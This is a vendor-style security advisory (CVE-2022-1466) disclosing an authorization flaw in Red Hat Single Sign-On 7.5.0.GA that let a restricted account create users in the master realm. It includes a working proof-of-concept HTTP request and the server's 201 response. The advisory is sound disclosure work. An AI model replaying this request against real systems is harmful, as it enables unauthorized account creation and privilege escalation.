CVE-2022-1466

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2021-076 Product: Red Hat Single Sign-On Manufacturer: Red Hat, Inc. Affected Version(s): 7.5.0.GA Tested Version(s): 7.5.0.GA Vulnerability Type: Improper Authorization (CWE-285) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2021-12-08 Solution Date: To be determined Public Disclosure: 2022-02-10 CVE Reference: Not yet assigned Author of Advisory: Christian Dölling, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Red Hat Single Sign-On is a single sign-on solution. The manufacturer describes the product as follows (see [1]): “Red Hat Single Sign-On (RH-SSO) is based on the Keycloak project and enables you to secure your web applications by providing Web single sign-on (SSO) capabilities based on popular standards such as SAML 2.0, OpenID Connect and OAuth 2.0. The RH-SSO server can act as a SAML or OpenID Connect-based Identity Provider, mediating with your enterprise user directory or 3rd-party SSO provider for identity information and your applications via standards-based tokens.” Due to improper authorization, Red Hat Single Sign-On is vulnerable to users performing actions they should not be allowed to perform. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: It was possible to add users to the master realm even though no respective permission was granted. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The author was provided with a user account with administrative privileges in all realms but the master realm. Within the master realm, read-only permissions were granted. This was confirmed by the owner of the Red Hat Single Sign-On instance and was reflected by the fact that an “add user” button was available in all realms but the master realm. Nevertheless, when the author sent the following request to the server, the server responded as shown below. Request: POST /auth/admin/realms/master/users HTTP/1.1 Host: login-stage.customer.com Cookie: INGRESS_SESSION_ID=XXX User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Authorization: Bearer […] Content-Length: 146 Origin: https://login-stage.customer.com Te: trailers Connection: close {"enabled":true,"attributes":{},"groups":[],"emailVerified":true,"username":"SySS PoC","email":"[email protected]","firstName":"SySS","lastName":"PoC"} Response: HTTP/1.1 201 Created Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://login-stage.customer.com Access-Control-Expose-Headers: Location Date: Tue, 07 Dec 2021 15:44:58 GMT Location: https://login-stage.customer.com/auth/admin/realms/master/users/f5436560-00d0-42db-8486-81db59e61612 Referrer-Policy: no-referrer Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: Close Afterwards, the author was able to confirm the successful creation of the user in the web front end. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Check authorization on server before adding a new user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-12-07: Vulnerability discovered 2021-12-08: Vulnerability reported to manufacturer TBD: Patch released by manufacturer 2022-02-10: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Red Hat Single Sign-On https://access.redhat.com/products/red-hat-single-sign-on [2] SySS Security Advisory SYSS-2021-076 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Christian Dölling of SySS GmbH. E-Mail: [email protected] Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_D%C3%B6lling.asc Key Fingerprint: 5478 245B 07F7 11D8 89EB 4FF9 22CC 67D4 1729 49A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided “as is” and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEVHgkWwf3EdiJ60/5Isxn1BcpSaIFAmIE6HUACgkQIsxn1Bcp SaKfbg/9GyOdyhl35vPAF2HA6EDO9jaSZGgePp9lfQIGUh5C+7J+ghGWMGLvE8jU /aB7UdK2MOnelYKeQkPskVFxJz4JT1iBXwOsSLiynHVMBZNENUsPtegiuxhmpS+N kRTEo7nf1/GF/vmnnZ8v2uUGLlmwvZDf4bjvHn2JZaiMtHyWcAmg0U8nuBdmdroM SgTHLnKPMMAlL1N/T1HnHzpH1fCEeyTF+PlTrKOMW7lhCovupfI49MuDU6aqCWMJ 9oD0din5mvfuR5S3xdeYRH9rrkW/nR3KNie8yiDQfghCXCXBPrJdt/zIIjxKV2Pq Gf5YDcApCfWxyjzuoi0WjZMTCV058k6o42YeRdlfA9+DGIKczE4bUZSUR3TSgbpW OfstVjm0JXGfnGpT3b3tAY4KPFxz7ZFmIFD16mm5JLaVSh1/dNSgLN0oiw7cjjgw qiebrjEH8zroJ6DYTMbZRm+7ILgxPhYt1b4vNYrb7HhuvYvaeKgDekKL6rl3LZsn sqxzyAN+4/cph1feBKX+2kq8b0xGg+7cY6eXDfPk0/7Fd30DiLi0Z0GiK1ylmTb1 oJCg8XXqvoV3DNfTko6yXypdltiEnE0h1uzRcmd94an/r3JjEPgXca9O+1mQPaF+ KS1kfkQIV0Z+1gbExlwsnRdq7d+naCPaYJ3lb28lvjXoL5Eb5HM= =3Tj7 -----END PGP SIGNATURE-----